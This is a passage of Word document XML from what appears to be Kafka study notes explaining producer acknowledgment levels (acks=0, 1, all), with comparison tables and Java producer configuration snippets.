                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22DF5211"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🟥</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Highest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C5C109E"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Most reliable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6365E3E6" w14:textId="77777777" w:rsidR="00F04AF9"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3775365">
          <v:rect id="_x0000_i3293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E4E697" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266F083F"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roperties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9C271E"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rops.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D954F49"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rops.put("acks", "all"); // Wait for all replicas to acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F95DC"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rops.put("retries", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4F9CE"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rops.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6520285A"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rops.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB900B4" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5CC478"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KafkaProducer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA0995" w14:textId="77777777" w:rsidR="00F04AF9"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3C7100D">
          <v:rect id="_x0000_i3294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E78BE" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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38"/>
        <w:gridCol w:w="2258"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="4DD35A0F" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01EABBD0" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2533C32D" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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Recommended acks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="0B1C8ACB" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4032D195"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High throughput, tolerate loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="789F1CB0"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="3FCCDE8B" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61055527"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Balance between safety and speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A096FB"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="131EB7E4" w14:textId="77777777" w:rsidTr="00F04AF9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31825FA7"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ritical data, need durability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="719C4562" w14:textId="77777777" w:rsidR="00F04AF9" w:rsidRPr="004269A3" w:rsidRDefault="00F04AF9"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all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1210FC47" w14:textId="7EE144E4"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lastRenderedPageBreak/>
        <w:pict w14:anchorId="7A93E8D5">
          <v:rect id="_x0000_i3295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AAEB5D" w14:textId="341AF370" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45115" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="819" w:name="_Toc196308299"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss the different acknowledgment levels (acks=0, acks=1, acks=all) in Kafka producers and their impact on message delivery reliability</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="819"/>
    </w:p>
    <w:p w14:paraId="4CD75D6E" w14:textId="60EE3F09" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Here's a breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different acknowledgment levels in Kafka producers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (acks) and how they impact </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery reliability, latency, and durability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D283593" w14:textId="77777777" w:rsidR="00D24F56"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CFE25FD">
          <v:rect id="_x0000_i3296" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C48D5" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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acks Configuration in Kafka Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2D3BE"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The acks parameter controls </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how many Kafka brokers must acknowledge</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the receipt of a message before the producer considers it </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>successfully sent</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1FAFD"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rops.put("acks", "0");   // or "1", "all"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26268305" w14:textId="77777777" w:rsidR="00D24F56"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041A61">
          <v:rect id="_x0000_i3297" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7D18C1" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Acknowledgment Levels Comparis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8"/>
        <w:gridCol w:w="2622"/>
        <w:gridCol w:w="2152"/>
        <w:gridCol w:w="1388"/>
        <w:gridCol w:w="2684"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="244B2125" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="102B77F6" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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acks Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EA5D5A8" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B027E32" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Reliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B04138" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59C2E153" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="08ADAD5D" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="714342CF"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acks=0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C66EC25"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Producer </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>doesn’t wait</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for any acknowledgment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537E257A"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Lowest (no durability guarantee)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29709196"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8E0048"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High-throughput logging, non-critical data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="1AA40F75" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09E08F25"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acks=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06E0476D"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Producer waits for </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ack from leader</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> broker only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6520D0ED"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Medium (risk if leader fails before replication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36FBF402"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>⚖️</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ACCB761"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Balanced scenarios, where speed matters but some reliability is needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="21DF23CD" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F1C1DD"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acks=all or acks=-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA70444"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Waits for </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>all in-sync replicas (ISR)</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to acknowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="355B7B65"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Highest (durability ensured)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1199B19A"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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>🐢</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Slowest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503F279A"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ritical systems, financial or transactional data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="086D35AF" w14:textId="77777777" w:rsidR="00D24F56"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174A8F1">
          <v:rect id="_x0000_i3298" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1359E" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Example Use Case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962CD56"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roperties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C150A"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rops.put("acks", "all"); // Ensures highest reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FEE56"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rops.put("retries", 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78171A94"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rops.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29638898"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rops.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7BE730"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rops.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E611094" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56" w:rsidP="004269A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CC5C612"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KafkaProducer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C853F" w14:textId="77777777" w:rsidR="00D24F56"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3821E1D">
          <v:rect id="_x0000_i3299" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A07A28" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Summary Decisi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79"/>
        <w:gridCol w:w="2258"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="43BB3B65" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7B3A2F" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Situation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3173D4E6" w14:textId="77777777" w:rsidR="00D24F56" w:rsidRPr="004269A3" w:rsidRDefault="00D24F56"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Recommended acks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="295B1837" w14:textId="77777777" w:rsidTr="00D24F56">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
